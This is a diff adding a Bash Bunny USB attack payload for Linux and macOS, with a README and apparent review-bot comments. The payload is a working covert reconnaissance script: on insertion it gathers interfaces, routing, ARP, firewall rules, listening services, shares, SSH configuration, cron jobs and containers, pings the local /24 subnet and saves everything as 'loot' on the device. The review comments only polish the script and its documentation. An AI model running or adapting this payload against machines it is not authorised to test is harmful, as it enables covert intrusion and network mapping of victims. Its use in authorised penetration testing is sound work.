52 changes: 52 additions & 0 deletions payloads/library/recon/NullSec-InfraRecon/README.md
@@ -0,0 +1,52 @@
# NullSec Infrastructure Recon

**Author:** NullSec (bad-antics)
**Version:** 1.0
**Category:** Recon
**Target:** Linux / macOS
**Device:** Bash Bunny

## Description

Comprehensive network infrastructure reconnaissance payload for the Bash Bunny. Uses only native system tools to collect detailed information about the target's network infrastructure.

### Data Collected

| Category | Details |
|----------|---------|
| System | OS version, kernel, hostname, user context |
| Interfaces | All network interfaces with IPs and MACs |
| Routing | Full routing table |
| ARP | Neighbor table with MAC addresses |
| DNS | Resolver configuration |
| Services | All listening ports with process names |
| Connections | Active TCP connections |
| Firewall | iptables/ufw/pf rules |
| Shares | SMB and NFS shares |
| SSH | Server config, authorized keys, known hosts |
| Subnet | Ping sweep of the /24 gateway subnet |
| Containers | Docker/Podman running containers |
| Cron | Scheduled jobs |

## LED Status

| LED | Status |
|-----|--------|
| Magenta (solid) | Setting up |
| Yellow (blink) | Attack in progress |
| Green (blink) | Complete |
| Red (blink) | Failed |

## Output

Report saved to `udisk/loot/nullsec-infrarecon/infrarecon_YYYYMMDD_HHMMSS.txt`

## Setup

No configuration required. Deploy to switch position and insert.

## Notes

- Zero external dependencies — uses only native commands
- Parallel ping sweep for speed (~15 seconds for /24)
- For authorized penetration testing only
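Review bot: the "Zero external dependencies — uses only native commands" claim in Notes does not match the Data Collected table, where the Shares row (SMB and NFS) and the Containers row (Docker/Podman) can only be filled in if `smbclient`, `showmount`, `docker` or `podman` happen to be installed; on a stock Linux or macOS install those sections will be empty. Either drop the two rows or reword the note to say those sections are best effort. Two smaller documentation points: the Services row says "All listening ports" but the payload only enumerates TCP listeners, and the metadata block (`**Author:**` through `**Device:**`) has no trailing line breaks, so Markdown renders the five fields as one run-on paragraph; end each line with two spaces or use a list.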
113 changes: 113 additions & 0 deletions payloads/library/recon/NullSec-InfraRecon/payload.txt
@@ -0,0 +1,113 @@
#!/bin/bash
#
# Title: NullSec Infrastructure Recon
# Author: NullSec (bad-antics)
# Version: 1.0
# Category: Recon
# Target: Linux / macOS
# Description: Comprehensive network infrastructure reconnaissance
# using native tools. Collects network topology, services,
# and security configuration data.
#
# LED SETUP : Magenta solid
# LED ATTACK : Yellow blink
# LED FINISH : Green blink
# LED FAIL : Red blink

# Config
LOOT_DIR=/root/udisk/loot/nullsec-infrarecon
REPORT="$LOOT_DIR/infrarecon_$(date +%Y%m%d_%H%M%S).txt"

# Setup
LED SETUP
mkdir -p "$LOOT_DIR"

# Attack
LED ATTACK

{
echo "=== NULLSEC INFRASTRUCTURE RECON ==="
echo "Timestamp: $(date '+%Y-%m-%d %H:%M:%S')"
echo "Hostname: $(hostname)"
echo "User: $(whoami)"
echo ""

echo "=== SYSTEM INFO ==="
uname -a
cat /etc/os-release 2>/dev/null | head -5
echo ""

echo "=== NETWORK INTERFACES ==="
ip addr show 2>/dev/null || ifconfig 2>/dev/null
echo ""

echo "=== ROUTING TABLE ==="
ip route show 2>/dev/null || netstat -rn 2>/dev/null
echo ""

echo "=== ARP TABLE ==="
ip neigh show 2>/dev/null || arp -a 2>/dev/null
echo ""

echo "=== DNS CONFIGURATION ==="
cat /etc/resolv.conf 2>/dev/null
echo ""

echo "=== LISTENING SERVICES ==="
ss -tlnp 2>/dev/null || netstat -tlnp 2>/dev/null
echo ""

echo "=== ESTABLISHED CONNECTIONS ==="
ss -tnp state established 2>/dev/null || netstat -tnp 2>/dev/null | grep ESTABLISHED
echo ""

echo "=== FIREWALL RULES ==="
iptables -L -n 2>/dev/null || ufw status verbose 2>/dev/null || pfctl -sr 2>/dev/null
echo ""

echo "=== NETWORK SHARES ==="
smbclient -L localhost -N 2>/dev/null
showmount -e localhost 2>/dev/null
echo ""

echo "=== SSH CONFIGURATION ==="
if [ -f /etc/ssh/sshd_config ]; then
echo "SSH Config:"
grep -E '^(Port|PermitRootLogin|PasswordAuth|PubkeyAuth|AllowUsers|AllowGroups)' /etc/ssh/sshd_config 2>/dev/null
echo "Authorized Keys:"
cat ~/.ssh/authorized_keys 2>/dev/null | wc -l
echo "Known Hosts:"
cat ~/.ssh/known_hosts 2>/dev/null | wc -l
fi
echo ""

echo "=== SUBNET SCAN ==="
# Get default gateway subnet
GW=$(ip route show default 2>/dev/null | awk '{print $3}' | head -1)
if [ -n "$GW" ]; then
SUBNET=$(echo "$GW" | sed 's/\.[0-9]*$/.0/')
echo "Scanning $SUBNET/24..."
for i in $(seq 1 254); do
IP="${SUBNET%.*}.$i"
(ping -c 1 -W 1 "$IP" > /dev/null 2>&1 && echo " [ALIVE] $IP") &
done
wait
fi
echo ""

echo "=== DOCKER / CONTAINERS ==="
docker ps -a 2>/dev/null
podman ps -a 2>/dev/null
echo ""

echo "=== CRON JOBS ==="
crontab -l 2>/dev/null
ls -la /etc/cron.d/ 2>/dev/null
echo ""

echo "=== END REPORT ==="
} > "$REPORT" 2>&1

# Finish
sync
LED FINISH
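Review bot: `LED FAIL` is declared in the header comment but there is no code path that ever emits it; `mkdir -p "$LOOT_DIR"` and the `> "$REPORT"` redirect are both unchecked, so an unwritable or missing udisk ends with LED FINISH and no report on disk. Suggest `mkdir -p "$LOOT_DIR" || { LED FAIL; exit 1; }` after `LED SETUP`, and a check such as `[ -s "$REPORT" ] || { LED FAIL; exit 1; }` before `LED FINISH`. Minor style points in the same file: `cat /etc/os-release 2>/dev/null | head -5` can be `head -5 /etc/os-release 2>/dev/null`, and the `smbclient`, `showmount`, `docker` and `podman` calls contradict the "native tools only" statement in the header; consider guarding them with `command -v` so the report says why a section is empty instead of printing nothing.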